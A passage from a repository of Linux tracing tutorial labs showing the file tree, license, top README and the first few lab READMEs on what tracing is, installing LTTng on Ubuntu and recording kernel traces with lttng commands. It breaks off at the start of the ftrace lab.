├── .gitignore ├── LICENSE ├── README.md ├── flamegraph.png └── labs ├── 001-what-is-tracing └── README.md ├── 002-install-lttng-on-ubuntu └── README.md ├── 003-record-kernel-trace-lttng └── README.md ├── 004-record-kernel-trace-ftrace └── README.md ├── 005-record-kernel-trace-perf └── README.md ├── 006-installing-tracecompass ├── README.md └── screenshots │ ├── addons.png │ ├── emptyWorkspace.png │ ├── genericCallStackAddons.png │ ├── importTraceDialog.png │ ├── importTraceMenu.png │ └── tutorialTracesImported.png ├── 101-analyze-system-trace-in-tracecompass ├── README.md └── screenshots │ ├── controlFlowView.png │ ├── fullTimeScale.png │ ├── histogramTimeRanges.png │ ├── importTraceDialog.png │ ├── importTraceMenu.png │ ├── kernelTraceJustOpened.png │ ├── projectExplorerExpanded.png │ ├── slowLs.png │ ├── timeGraphViewFilter.png │ ├── timeGraphViewLegend.png │ ├── timeGraphViewRemoveFilter.png │ ├── timeGraphViewSearch.png │ ├── traceCompassCpuUsage.png │ ├── traceCompassDiskActivity.png │ ├── traceCompassLatencyViews.png │ └── traceCompassStatisticsView.png ├── 102-tracing-wget-critical-path ├── README.md └── screenshots │ ├── compareCriticalPaths.png │ ├── criticalPathLegend.png │ ├── followProcess.png │ ├── followProcessZoom.png │ ├── kernelWaitAnalysisDjango.png │ ├── measureTimeDifference.png │ ├── newViewPinnedToSecond.png │ ├── pinToFirstTrace.png │ └── searchProcessTrace.png ├── 103-compare-package-managers ├── README.md └── screenshots │ ├── addBookmark.png │ ├── apt.png │ ├── importArchive.png │ ├── pacman.png │ ├── searchEventTableOpened.png │ ├── searchEventTableTree.png │ ├── yum.png │ └── zypper.png ├── 201-lttng-userspace-tracing ├── FlameChartsVsFlameGraphs.md ├── README.md ├── executables │ ├── ls │ └── wget └── screenshots │ ├── configureSymbols.png │ ├── configureSymbolsNameMapping.png │ ├── configureSymbolsRootDirectory.png │ ├── entryExitEvents.png │ ├── flameChart.png │ ├── flameGraph.png │ ├── functionDurationDistribution.png │ ├── functionDurationStatistics.png │ ├── incubatorFlameViews.png │ ├── openKernelUstExperiment.png │ ├── statedumpBinInfo.png │ ├── ustKernelConfigureSymbols.png │ ├── ustKernelCriticalPath.png │ ├── ustKernelFlameChart.png │ ├── ustKernelFlameGraph.png │ ├── ustKernelFollowThread.png │ ├── ustMemoryPotentialLeaks.png │ └── ustMemoryUsage.png ├── 202-bug-hunt ├── BugHuntResults.md ├── README.md ├── files │ ├── cat │ └── cat.c └── screenshots │ ├── importExperiment.png │ ├── memoryLeak.png │ ├── openExperiment.png │ ├── optimizationLoop.png │ ├── phoneHome.png │ └── spawnProcess.png ├── 203-custom-userspace-instrumentation-in-c ├── README.md ├── code │ ├── makefile │ ├── makefile.orig │ ├── ring.c │ ├── ring.orig.c │ ├── ring_tp.c │ └── ring_tp.h └── screenshots │ └── originalCode.png ├── 204-scripted-analysis-for-custom-instrumentation ├── README.md ├── screenshots │ ├── changeJavascriptEngine.png │ ├── customTraceOpened.png │ ├── enginesAndModules.png │ ├── installPlugIn.png │ ├── newFile.png │ ├── newFileName.png │ ├── runAsScript.png │ ├── scriptOutputConsole.png │ ├── scriptOutputEventsConsole.png │ ├── scriptedTimeGraph.png │ ├── scriptedTimeGraphArrows.png │ └── stateSystemExplorer.png └── scripts │ ├── step1_readTrace.js │ ├── step2_readEvents.js │ ├── step3_stateSystem.js │ ├── step4_timeLine.js │ └── step5_timeGraphArrow.js ├── 301-tracing-multiple-machines ├── README.md ├── screenshots │ ├── criticalPathWgetCold.png │ ├── criticalPathWgetHot.png │ ├── eventMatchingNoSync.png │ ├── eventMatchingSync.png │ ├── importExperiment.png │ 
├── openAsExperiment.png │ ├── openExperiment.png │ ├── synchronizationResults.png │ └── synchronizeTraces.png └── scripts │ ├── payload │ ├── setupKernelTrace │ └── traceClientServer ├── 302-system-tracing-containers ├── README.md └── screenshots │ ├── installVMPlugin.png │ ├── selectContainer.png │ ├── virtualResourcesContainer.png │ ├── virtualResourcesContainerHighlighted.png │ ├── virtualResourcesZoomIn.png │ └── vmExperimentContainer.png ├── 303-jaeger-opentracing-traces ├── README.md └── screenshots │ ├── fetchWindow.png │ ├── fetchedTraces.png │ ├── installPlugIn.png │ ├── legend.png │ ├── perspective.png │ ├── rightClickMenu.png │ └── spanLifeView.png ├── 304-rocm-traces ├── README.md ├── screenshots │ └── openATrace.gif └── scripts │ ├── bt_plugin_rocm.py │ └── ctftrace.py ├── README.md └── TraceCompassTutorialTraces.tgz /.gitignore: -------------------------------------------------------------------------------- 1 | labs/203-custom-userspace-instrumentation-in-c/code/ring 2 | labs/203-custom-userspace-instrumentation-in-c/code/ring_tp.o 3 | labs/TraceCompassTutorialTraces/ 4 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Creative Commons Attribution 4.0 International Public License 2 | 3 | By exercising the Licensed Rights (defined below), You accept and agree to be 4 | bound by the terms and conditions of this Creative Commons Attribution 4.0 5 | International Public License ("Public License"). To the extent this Public 6 | License may be interpreted as a contract, You are granted the Licensed Rights in 7 | consideration of Your acceptance of these terms and conditions, and the Licensor 8 | grants You such rights in consideration of benefits the Licensor receives from 9 | making the Licensed Material available under these terms and conditions. 10 | 11 | Section 1 – Definitions. 12 | 13 | Adapted Material means material subject to Copyright and Similar Rights that 14 | is derived from or based upon the Licensed Material and in which the Licensed 15 | Material is translated, altered, arranged, transformed, or otherwise modified in 16 | a manner requiring permission under the Copyright and Similar Rights held by the 17 | Licensor. For purposes of this Public License, where the Licensed Material is a 18 | musical work, performance, or sound recording, Adapted Material is always 19 | produced where the Licensed Material is synched in timed relation with a moving 20 | image. Adapter's License means the license You apply to Your Copyright and 21 | Similar Rights in Your contributions to Adapted Material in accordance with the 22 | terms and conditions of this Public License. Copyright and Similar Rights means 23 | copyright and/or similar rights closely related to copyright including, without 24 | limitation, performance, broadcast, sound recording, and Sui Generis Database 25 | Rights, without regard to how the rights are labeled or categorized. For 26 | purposes of this Public License, the rights specified in Section 2(b)(1)-(2) are 27 | not Copyright and Similar Rights. Effective Technological Measures means those 28 | measures that, in the absence of proper authority, may not be circumvented under 29 | laws fulfilling obligations under Article 11 of the WIPO Copyright Treaty 30 | adopted on December 20, 1996, and/or similar international agreements. 
31 | Exceptions and Limitations means fair use, fair dealing, and/or any other 32 | exception or limitation to Copyright and Similar Rights that applies to Your use 33 | of the Licensed Material. Licensed Material means the artistic or literary 34 | work, database, or other material to which the Licensor applied this Public 35 | License. Licensed Rights means the rights granted to You subject to the terms 36 | and conditions of this Public License, which are limited to all Copyright and 37 | Similar Rights that apply to Your use of the Licensed Material and that the 38 | Licensor has authority to license. Licensor means the individual(s) or 39 | entity(ies) granting rights under this Public License. Share means to provide 40 | material to the public by any means or process that requires permission under 41 | the Licensed Rights, such as reproduction, public display, public performance, 42 | distribution, dissemination, communication, or importation, and to make material 43 | available to the public including in ways that members of the public may access 44 | the material from a place and at a time individually chosen by them. Sui 45 | Generis Database Rights means rights other than copyright resulting from 46 | Directive 96/9/EC of the European Parliament and of the Council of 11 March 1996 47 | on the legal protection of databases, as amended and/or succeeded, as well as 48 | other essentially equivalent rights anywhere in the world. You means the 49 | individual or entity exercising the Licensed Rights under this Public License. 50 | Your has a corresponding meaning. 51 | 52 | Section 2 – Scope. 53 | 54 | License grant. Subject to the terms and conditions of this Public License, 55 | the Licensor hereby grants You a worldwide, royalty-free, non-sublicensable, 56 | non-exclusive, irrevocable license to exercise the Licensed Rights in the 57 | Licensed Material to: reproduce and Share the Licensed Material, in whole or in 58 | part; and produce, reproduce, and Share Adapted Material. Exceptions and 59 | Limitations. For the avoidance of doubt, where Exceptions and Limitations apply 60 | to Your use, this Public License does not apply, and You do not need to comply 61 | with its terms and conditions. Term. The term of this Public License is 62 | specified in Section 6(a). Media and formats; technical modifications allowed. 63 | The Licensor authorizes You to exercise the Licensed Rights in all media and 64 | formats whether now known or hereafter created, and to make technical 65 | modifications necessary to do so. The Licensor waives and/or agrees not to 66 | assert any right or authority to forbid You from making technical modifications 67 | necessary to exercise the Licensed Rights, including technical modifications 68 | necessary to circumvent Effective Technological Measures. For purposes of this 69 | Public License, simply making modifications authorized by this Section 2(a)(4) 70 | never produces Adapted Material. Downstream recipients. Offer from the 71 | Licensor – Licensed Material. Every recipient of the Licensed Material 72 | automatically receives an offer from the Licensor to exercise the Licensed 73 | Rights under the terms and conditions of this Public License. No downstream 74 | restrictions. You may not offer or impose any additional or different terms or 75 | conditions on, or apply any Effective Technological Measures to, the Licensed 76 | Material if doing so restricts exercise of the Licensed Rights by any recipient 77 | of the Licensed Material. No endorsement. 
Nothing in this Public License 78 | constitutes or may be construed as permission to assert or imply that You are, 79 | or that Your use of the Licensed Material is, connected with, or sponsored, 80 | endorsed, or granted official status by, the Licensor or others designated to 81 | receive attribution as provided in Section 3(a)(1)(A)(i). 82 | 83 | Other rights. Moral rights, such as the right of integrity, are not 84 | licensed under this Public License, nor are publicity, privacy, and/or other 85 | similar personality rights; however, to the extent possible, the Licensor waives 86 | and/or agrees not to assert any such rights held by the Licensor to the limited 87 | extent necessary to allow You to exercise the Licensed Rights, but not 88 | otherwise. Patent and trademark rights are not licensed under this Public 89 | License. To the extent possible, the Licensor waives any right to collect 90 | royalties from You for the exercise of the Licensed Rights, whether directly or 91 | through a collecting society under any voluntary or waivable statutory or 92 | compulsory licensing scheme. In all other cases the Licensor expressly reserves 93 | any right to collect such royalties. 94 | 95 | Section 3 – License Conditions. 96 | 97 | Your exercise of the Licensed Rights is expressly made subject to the following 98 | conditions. 99 | 100 | Attribution. 101 | 102 | If You Share the Licensed Material (including in modified form), You 103 | must: retain the following if it is supplied by the Licensor with the Licensed 104 | Material: identification of the creator(s) of the Licensed Material and any 105 | others designated to receive attribution, in any reasonable manner requested by 106 | the Licensor (including by pseudonym if designated); a copyright notice; a 107 | notice that refers to this Public License; a notice that refers to the 108 | disclaimer of warranties; a URI or hyperlink to the Licensed Material to the 109 | extent reasonably practicable; indicate if You modified the Licensed Material 110 | and retain an indication of any previous modifications; and indicate the 111 | Licensed Material is licensed under this Public License, and include the text 112 | of, or the URI or hyperlink to, this Public License. You may satisfy the 113 | conditions in Section 3(a)(1) in any reasonable manner based on the medium, 114 | means, and context in which You Share the Licensed Material. For example, it may 115 | be reasonable to satisfy the conditions by providing a URI or hyperlink to a 116 | resource that includes the required information. If requested by the Licensor, 117 | You must remove any of the information required by Section 3(a)(1)(A) to the 118 | extent reasonably practicable. If You Share Adapted Material You produce, the 119 | Adapter's License You apply must not prevent recipients of the Adapted Material 120 | from complying with this Public License. 121 | 122 | Section 4 – Sui Generis Database Rights. 
123 | 124 | Where the Licensed Rights include Sui Generis Database Rights that apply to Your 125 | use of the Licensed Material: 126 | 127 | for the avoidance of doubt, Section 2(a)(1) grants You the right to extract, 128 | reuse, reproduce, and Share all or a substantial portion of the contents of the 129 | database; if You include all or a substantial portion of the database contents 130 | in a database in which You have Sui Generis Database Rights, then the database 131 | in which You have Sui Generis Database Rights (but not its individual contents) 132 | is Adapted Material; and You must comply with the conditions in Section 3(a) if 133 | You Share all or a substantial portion of the contents of the database. 134 | 135 | For the avoidance of doubt, this Section 4 supplements and does not replace Your 136 | obligations under this Public License where the Licensed Rights include other 137 | Copyright and Similar Rights. 138 | 139 | Section 5 – Disclaimer of Warranties and Limitation of Liability. 140 | 141 | Unless otherwise separately undertaken by the Licensor, to the extent 142 | possible, the Licensor offers the Licensed Material as-is and as-available, and 143 | makes no representations or warranties of any kind concerning the Licensed 144 | Material, whether express, implied, statutory, or other. This includes, without 145 | limitation, warranties of title, merchantability, fitness for a particular 146 | purpose, non-infringement, absence of latent or other defects, accuracy, or the 147 | presence or absence of errors, whether or not known or discoverable. Where 148 | disclaimers of warranties are not allowed in full or in part, this disclaimer 149 | may not apply to You. To the extent possible, in no event will the Licensor be 150 | liable to You on any legal theory (including, without limitation, negligence) or 151 | otherwise for any direct, special, indirect, incidental, consequential, 152 | punitive, exemplary, or other losses, costs, expenses, or damages arising out of 153 | this Public License or use of the Licensed Material, even if the Licensor has 154 | been advised of the possibility of such losses, costs, expenses, or damages. 155 | Where a limitation of liability is not allowed in full or in part, this 156 | limitation may not apply to You. 157 | 158 | The disclaimer of warranties and limitation of liability provided above 159 | shall be interpreted in a manner that, to the extent possible, most closely 160 | approximates an absolute disclaimer and waiver of all liability. 161 | 162 | Section 6 – Term and Termination. 163 | 164 | This Public License applies for the term of the Copyright and Similar Rights 165 | licensed here. However, if You fail to comply with this Public License, then 166 | Your rights under this Public License terminate automatically. 167 | 168 | Where Your right to use the Licensed Material has terminated under Section 169 | 6(a), it reinstates: automatically as of the date the violation is cured, 170 | provided it is cured within 30 days of Your discovery of the violation; or upon 171 | express reinstatement by the Licensor. For the avoidance of doubt, this Section 172 | 6(b) does not affect any right the Licensor may have to seek remedies for Your 173 | violations of this Public License. For the avoidance of doubt, the Licensor may 174 | also offer the Licensed Material under separate terms or conditions or stop 175 | distributing the Licensed Material at any time; however, doing so will not 176 | terminate this Public License. 
Sections 1, 5, 6, 7, and 8 survive termination 177 | of this Public License. 178 | 179 | Section 7 – Other Terms and Conditions. 180 | 181 | The Licensor shall not be bound by any additional or different terms or 182 | conditions communicated by You unless expressly agreed. Any arrangements, 183 | understandings, or agreements regarding the Licensed Material not stated herein 184 | are separate from and independent of the terms and conditions of this Public 185 | License. 186 | 187 | Section 8 – Interpretation. 188 | 189 | For the avoidance of doubt, this Public License does not, and shall not be 190 | interpreted to, reduce, limit, restrict, or impose conditions on any use of the 191 | Licensed Material that could lawfully be made without permission under this 192 | Public License. To the extent possible, if any provision of this Public License 193 | is deemed unenforceable, it shall be automatically reformed to the minimum 194 | extent necessary to make it enforceable. If the provision cannot be reformed, it 195 | shall be severed from this Public License without affecting the enforceability 196 | of the remaining terms and conditions. No term or condition of this Public 197 | License will be waived and no failure to comply consented to unless expressly 198 | agreed to by the Licensor. Nothing in this Public License constitutes or may be 199 | interpreted as a limitation upon, or waiver of, any privileges and immunities 200 | that apply to the Licensor or You, including from the legal processes of any 201 | jurisdiction or authority. 202 | 203 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Trace Visualization Labs 2 | 3 | ![flamegraph](flamegraph.png) 4 | 5 | This repository contains a series of labs and guides for collecting traces from the operating system or userspace applications or cloud environments, and visualizing them with trace visualization tools. While most of the labs will use [LTTng](http://lttng.org) for trace collection and [Trace Compass](http://tracecompass.org/) for visualization, some labs may use other tools. 6 | 7 | Each lab has specific goals and objectives. The main text is present in the README of each lab's directory and contains various tasks outlined chronologically, to achieve the goal and complete the lab. The text also contains suggestions for navigation of the tasks. There will also be screenshots for each lab to help you guide through the UI and visualizations. Sample traces for all the labs are saved in a compressed file named [TraceCompassTutorialTraces.tgz](https://github.com/tuxology/tracevizlab/blob/master/labs/TraceCompassTutorialTraces.tgz) which can allow the user to skip reproducing the experiment and generating traces. 8 | 9 | This lab can be reproduced, with a hands-on approach, with the tracing and visualization tools at hand. Or it can simply be read, in which case some sections of the labs, describing shorcuts and navigation options, may be skipped. Those sections are contained between :small_red_triangle_down: and :small_red_triangle: signs. 
10 | 11 | ### Goals 12 | 13 | - Understand what tracing is and when it can be of help in diagnosing performance issues 14 | - Identify tracing tools and understand techniques that are used to generate traces 15 | - Select and use the correct set of trace visualizations to quickly identify performance issues 16 | - Understand application/OS behavior and its internals using tracing 17 | 18 | ### Prerequisites 19 | 20 | - A Linux system or a Linux virtual machine 21 | - Basic understanding of Operating Systems fundamentals 22 | - Some experience in debugging applications and systems 23 | 24 | ## Lab developers 25 | - [Matthew Khouzam](https://twitter.com/DavisTurlis) 26 | - [Geneviève Bastien](https://twitter.com/genbastien) 27 | - [Mohamad Gebai](https://twitter.com/mogeb88) 28 | - [Suchakra Sharma](https://twitter.com/tuxology) 29 | - Arnaud Fiorini 30 | - Katherine Nadeau 31 | -------------------------------------------------------------------------------- /flamegraph.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/tuxology/tracevizlab/cbfabd663fd186b1ab3bca900954c38beaa60779/flamegraph.png -------------------------------------------------------------------------------- /labs/001-what-is-tracing/README.md: -------------------------------------------------------------------------------- 1 | ## What/When/Why Tracing 2 | 3 | Before going further in this tutorial and starting with the labs, let's define tracing: what it is, when to use it and how it compares with other tools. 4 | 5 | - - - 6 | 7 | ### What Is Tracing? 8 | 9 | `Tracing` consists of recording specific information during a program's or operating system's execution to better understand what is happening on the system. The simplest form of tracing is what we all learn in programming 101: printf! 10 | 11 | Every location in the code that we want to trace is called a `tracepoint` and every time a tracepoint is hit is called an `event`. Putting tracepoints in the code is called `instrumentation`. The following example shows those concepts: 12 | 13 | ``` 14 | int my_func(void* my_value) { 15 | int i, ret; 16 | 17 | printf("Entering my function"); // <-- tracepoint 18 | for (i = 0; i < MAX; i++) { 19 | ret = do_something_with(my_value, i); 20 | printf("In for loop %d", i); // <-- tracepoint 21 | } 22 | printf("Done: %d", ret); // <-- tracepoint 23 | 24 | return ret; 25 | } 26 | ``` 27 | 28 | ``` 29 | $ ./myprog 30 | Entering my function // <-- event 31 | In for loop 0 // <-- event 32 | In for loop 1 // <-- event 33 | In for loop 2 // <-- event 34 | Done: 10 // <-- event 35 | ``` 36 | 37 | But printf is usually used for quick, instantaneous debugging of an application and is removed from production code (right?) 38 | 39 | Logging is another form of tracing. It usually associates a timestamp with events to better understand the timing in the application. But we usually log only high-level information, as disk space is a limited resource (right?) 40 | 41 | The `tracing` we're discussing here is high speed, low overhead tracing. With such tracing, the tracepoints can be present in the code at all times (Linux has tons of tracepoints in its code, ready to be hooked to), they have a near-zero overhead when not tracing and a very low one with a tracer enabled. Tracers can handle hundreds of thousands of events per second.
Some tracers, like ftrace, lttng and perf, store the events on disk for later processing; others, like ebpf, handle them on the fly in callbacks that can aggregate data to gather statistics or can immediately react to any anomaly. 42 | 43 | - - - 44 | 45 | ### When To Trace? 46 | 47 | Tracing is just another tool in the developer or sysadmin's toolbox. It is most often not the first one to use. But in some situations, it can be very useful, regardless of whether the application to trace is instrumented or not (see next section). 48 | 49 | Tracing is best used to understand very complex systems, or even simple ones, but the real added value comes when trying to understand complexity and all else fails. 50 | 51 | First, let's see what else is in the toolbox and when to best use each of those tools. 52 | 53 | * If you want to know what could/should be optimized in your application, where it spends the most time, etc., then `profiling` or `sampling` is the best tool for the job. It will aggregate data of the different calls and show statistical results. The longer you profile, the more accurate the results will be. Some profilers also provide an `instrumented` mode, which is really close to tracing. By default, it aggregates the data like sampled profiling, only more accurately, but if it's possible to store the events, it could make a good userspace trace. 54 | 55 | * If you want to debug your very complex algorithm, then a good `debugger` is the best approach, or even printfs! 56 | 57 | * If you want to know what happened at 8:06 PM on your server farm when there was that big DDoS attack, then `log` files are the best first go-to. The answer is probably there. 58 | 59 | * If you want to get performance metrics on your system through time, then `monitoring` is mandatory. Some highly detailed monitoring tools use `instrumentation`, the same as for tracing, to compute some metrics. But monitoring is mostly aggregation of data to throw alerts and show in nice graphs and dashboards. 60 | 61 | When these tools fail though, `tracing` is there: 62 | 63 | * When `profiling` misses that one call, around 17 minutes into the execution, where there was a huge latency, it will either go unnoticed, or be lost as a statistic, without context or detail. `Tracing` can detect that latency and you can then zoom in on it and see everything that happened around that time and led to that moment. 64 | 65 | * When `debugging` your algorithm, or even printing the details, the bug never happens. The added latency of those techniques makes that race condition impossible to catch! Or that unit test that fails one in a hundred times. Or that service that times out whenever you start debugging. `Tracing`'s overhead is rarely high enough to remove the potential race condition or have the system time out, so if running with tracing enabled, when the problem happens, the trace may show what happened on the system at the time, or you may need to enable more events, but it will eventually show something. 66 | 67 | * When `log` files have put you on a trail, but looking at everything, you just can't put your finger on it. `Tracing` will show everything (well, almost) that is hidden from log data and you can have an overview of the whole system at a given time. 68 | 69 | * When `monitoring` shows a problematic period and querying the `logs` at that time shows the guilty component (or not), `tracing` will allow you to drill down into that component or system at that time to help pinpoint the problem more accurately.
70 | 71 | - - - 72 | 73 | ### What To Trace? Application Vs System Vs Distributed Tracing 74 | 75 | So, what do we trace? Typically, applications have log statements in various locations, associated with a log level. Statements with high verbosity can be considered tracing statements. Log verbosity can be modified, either at system start or at runtime. Sometimes, various log handlers can be hooked to the application, per verbosity level. While file handlers are the most common, other types of logging can be used. Sometimes, the logging backend can be selected at compile time: `qemu`, for instance, can compile some statements with various backends: `systemtap`, `LTTng UST`, `simple` or `stderr`. 76 | 77 | This is what we call `application tracing`, as it gives information on the internal state of the application: what happens in user land. 78 | 79 | Sounds easy and wonderful, but how many applications have tracepoints? Not that many, though more and more do, but that doesn't matter [too much]. 80 | 81 | Because there is also `system tracing`. Operating systems and drivers themselves have [a lot!] of tracepoints in their code, and that alone gives a lot of information about an application, and mostly, about the system on which it's executing. So even without any user space data, a trace of the OS can be enough to identify many typical application problems. 82 | 83 | `Application tracing` and `system tracing` together are very powerful. The former lets you capture the problem, locate it in time, and get the application context, like the picture of a group in front of the green screen. The latter puts this picture in its environment, i.e. it draws the background of that group picture. 84 | 85 | In this tutorial, we will focus only on Linux, but Windows also has its tracing framework, called [ETW](https://docs.microsoft.com/en-us/windows/desktop/etw/about-event-tracing). 86 | 87 | Nowadays, applications are developed as micro-services running in containers that can be run on various machines, either physical or virtual. Micro-services communicate with each other through message-passing libraries or home-made communication layers. `Distributed tracing` makes it possible to follow requests across those systems. APIs like the [`OpenTracing API`](https://opentracing.io/) provide a means to instrument the various components of the system, and many common communication libraries are already instrumented. They only require a tracer to enable collecting data. 88 | 89 | - - - 90 | 91 | ### How To Trace? 92 | 93 | The rest of this tutorial will answer that question and more! 94 | 95 | - - - 96 | 97 | #### Next 98 | 99 | * [Install LTTng on Ubuntu](../002-install-lttng-on-ubuntu) to install `LTTng` as a tracing tool (for applications and systems) and record traces 100 | or 101 | * [Record System Trace With LTTng](../003-record-kernel-trace-lttng) to record system traces with `lttng`, if it is already installed.
102 | or 103 | * [Record System Trace With Ftrace](../004-record-kernel-trace-ftrace) to record system traces with `ftrace` 104 | or 105 | * [Record System Trace With Perf](../005-record-kernel-trace-perf) to record system traces with `perf` 106 | or 107 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool and use the traces provided with the tutorial 108 | or 109 | * [Back](../) for more options 110 | -------------------------------------------------------------------------------- /labs/002-install-lttng-on-ubuntu/README.md: -------------------------------------------------------------------------------- 1 | ## Installing LTTng on Ubuntu 2 | 3 | In this lab, you will install lttng on an Ubuntu machine. 4 | 5 | *Pre-requisites*: Have root access to an Ubuntu LTS machine 6 | 7 | - - - 8 | 9 | ### Task 1: Install lttng for kernel tracing 10 | 11 | First install the lttng PPA repository: 12 | 13 | ``` 14 | $ sudo apt-add-repository ppa:lttng/stable-2.10 15 | ``` 16 | 17 | This should automatically fetch the updates for all repos. If not, you may need to manually update your repositories: 18 | 19 | ``` 20 | $ sudo apt-get update 21 | ``` 22 | 23 | For kernel tracing only, the **lttng-modules-dkms** and **lttng-tools** packages need to be installed: 24 | 25 | ``` 26 | $ sudo apt-get install lttng-tools lttng-modules-dkms 27 | ``` 28 | 29 | The package installation will have created a group called **tracing**. This group allows its members to run lttng commands without *sudo* and, consequently, to save traces that are directly readable by the user instead of saving them as root. The installation does not add the user to the **tracing** group, so you may do it at this point: 30 | 31 | ``` 32 | $ sudo usermod -a -G tracing <username> 33 | ``` 34 | Make sure the user logs off and back in to apply the group modification. You can also start a shell logged in the tracing group using: 35 | 36 | ``` 37 | newgrp tracing 38 | ``` 39 | 40 | You are now ready to get a kernel trace. You may proceed to the [Record a kernel trace](../003-record-kernel-trace-lttng) lab or install additional packages to get more tracing options. Most of them will be covered in later labs, so it is advised to install them now.
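
Before moving on to the next task, a quick sanity check can confirm that lttng-tools is installed and that the group change took effect for your shell. The output below is only illustrative; the exact version and group list will differ on your system:

```
$ lttng --version
lttng (LTTng Trace Control) 2.10.x
$ groups
<username> adm sudo plugdev tracing
```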
41 | 42 | - - - 43 | 44 | ### Task 2: Install LTTng's additional packages for different purposes 45 | 46 | To trace userspace applications with some builtin features, for example function entry and exit, application memory allocations and other calls to the libc library: 47 | 48 | ``` 49 | $ sudo apt-get install liblttng-ust0 50 | ``` 51 | 52 | To add userspace tracepoints to your own application: 53 | 54 | ``` 55 | $ sudo apt-get install liblttng-ust-dev 56 | ``` 57 | 58 | To trace Java applications instrumented with either JUL or Log4j: 59 | 60 | ``` 61 | $ sudo apt-get install liblttng-ust-agent-java 62 | ``` 63 | 64 | To instrument and trace python3 applications: 65 | 66 | ``` 67 | $ sudo apt-get install python3-lttngust 68 | ``` 69 | 70 | - - - 71 | 72 | ### References 73 | 74 | * [LTTng website](http://lttng.org) 75 | * [Installation instructions for Ubuntu](https://lttng.org/docs/v2.10/#doc-ubuntu) 76 | * [Instructions for other distributions](https://lttng.org/download/) 77 | 78 | - - - 79 | 80 | #### Next 81 | 82 | * [Record kernel trace with LTTng](../003-record-kernel-trace-lttng) to record a kernel trace 83 | or 84 | * [Back](../) for more options 85 | -------------------------------------------------------------------------------- /labs/003-record-kernel-trace-lttng/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With LTTng 2 | 3 | In this lab, you will obtain a kernel trace that can then be analyzed by various visualization tools. 4 | 5 | *Pre-requisite*: Have lttng installed. You can follow the [Installing LTTng on Ubuntu](../002-install-lttng-on-ubuntu/) lab, read the [LTTng Download page](https://lttng.org/download/) for installation instructions for other distributions or use a Virtual Machine with LTTng pre-installed, provided by the instructor. 6 | 7 | - - - 8 | 9 | ### Task 1: Tracing session daemon 10 | 11 | In order to trace with lttng, one first needs to have the tracing session daemon running as root. If you installed from packages, it should already be running. You can verify by running 12 | 13 | ``` 14 | $ systemctl status lttng-sessiond 15 | ``` 16 | 17 | If the service is available but not running, you can start it with 18 | 19 | ``` 20 | $ sudo systemctl start lttng-sessiond 21 | ``` 22 | 23 | If you installed from source or the service is not available on your distro, you can start the session daemon manually 24 | 25 | ``` 26 | $ sudo lttng-sessiond -d 27 | ``` 28 | 29 | - - - 30 | 31 | ### Task 2: Get a kernel trace 32 | 33 | First, you need to create a tracing session. This session can be configured with various events. 34 | 35 | ``` 36 | $ lttng create 37 | Session auto-20180723-180856 created. 38 | Traces will be written in /home/virtual/lttng-traces/auto-20180723-180856 39 | ``` 40 | 41 | The output of the command will indicate where the trace will be saved. 42 | 43 | The following commands will enable the events necessary to take advantage of a maximum of analyses in Trace Compass, without generating a trace too large. 
44 | 45 | ``` 46 | $ lttng enable-event -k sched_switch,sched_waking,sched_pi_setprio,sched_process_fork,sched_process_exit,sched_process_free,sched_wakeup,\ 47 | irq_softirq_entry,irq_softirq_raise,irq_softirq_exit,irq_handler_entry,irq_handler_exit,\ 48 | lttng_statedump_process_state,lttng_statedump_start,lttng_statedump_end,lttng_statedump_network_interface,lttng_statedump_block_device,\ 49 | block_rq_complete,block_rq_insert,block_rq_issue,\ 50 | block_bio_frontmerge,sched_migrate,sched_migrate_task,power_cpu_frequency,\ 51 | net_dev_queue,netif_receive_skb,net_if_receive_skb,\ 52 | timer_hrtimer_start,timer_hrtimer_cancel,timer_hrtimer_expire_entry,timer_hrtimer_expire_exit 53 | $ lttng enable-event -k --syscall --all 54 | ``` 55 | 56 | Next, you can start the tracing session: 57 | 58 | ``` 59 | $ lttng start 60 | ``` 61 | 62 | Execute the payload to trace, here a simple ```wget``` command: 63 | 64 | ``` 65 | $ wget https://lttng.org 66 | ``` 67 | 68 | Then stop and destroy the tracing session: 69 | 70 | ``` 71 | $ lttng destroy 72 | ``` 73 | 74 | - - - 75 | 76 | ### Task 3: Use a utility script to trace 77 | 78 | The [lttng-utils](https://github.com/tahini/lttng-utils) script can be used to trace instead of the commands of the previous task. First, get and install the script: 79 | 80 | ``` 81 | $ sudo pip3 install --upgrade git+git://github.com/tahini/lttng-utils.git@master 82 | ``` 83 | 84 | See the README for more install options. Once installed, you can just run the trace record script with the command to run. For instance, to reproduce the same result as the previous task, simply do 85 | 86 | ``` 87 | $ lttng-record-trace wget https://lttng.org 88 | ``` 89 | 90 | The trace will be saved in the current directory, unless you specify an ``--output`` path on the command line. 91 | 92 | - - - 93 | 94 | ### Task 4: Retrieve the trace 95 | 96 | If the trace was not taken on the machine on which trace visualization will happen (for example, in a VM provided by the instructors), then the trace needs to be brought over to the trace viewing machine. An LTTng trace consists of a directory with a metadata file, plus one tracing file and one index file for each CPU traced. To retrieve it, rsync is the best command: 97 | 98 | ``` 99 | $ rsync -avz <user>@<remote-host>:<path/to/trace> traces/ 100 | ``` 101 | 102 | - - - 103 | 104 | ### References 105 | 106 | * [LTTng user documentation](http://lttng.org/docs) 107 | * [lttng-utils](https://github.com/tahini/lttng-utils) tracing helper documentation 108 | 109 | - - - 110 | 111 | #### Next 112 | 113 | * [Record kernel trace with ftrace](../004-record-kernel-trace-ftrace) to record a kernel trace with ftrace 114 | or 115 | * [Installing Trace Compass](../006-installing-tracecompass) to install the visualization tool 116 | or 117 | * [Back](../) for more options 118 | -------------------------------------------------------------------------------- /labs/004-record-kernel-trace-ftrace/README.md: -------------------------------------------------------------------------------- 1 | ## Record a Kernel Trace With Ftrace 2 | 3 | While this tutorial will mainly use LTTng for tracing, as it can provide both kernel and userspace traces, synchronized on the same time reference, it is also possible to get the same results for kernel tracing using `ftrace`. Ftrace has the advantage that it is built into the Linux kernel and many people are used to it. In this lab, you will obtain a kernel trace that can then be analyzed by the visualization tools, using ftrace and trace-cmd.
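
Since ftrace is built into the kernel, you can quickly verify that it is available before installing anything. This is only a sanity check; the listed tracers vary by kernel, and on recent kernels the tracefs mount point may be `/sys/kernel/tracing` instead of `/sys/kernel/debug/tracing`:

```
$ sudo cat /sys/kernel/debug/tracing/available_tracers
hwlat blk function_graph function nop
```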
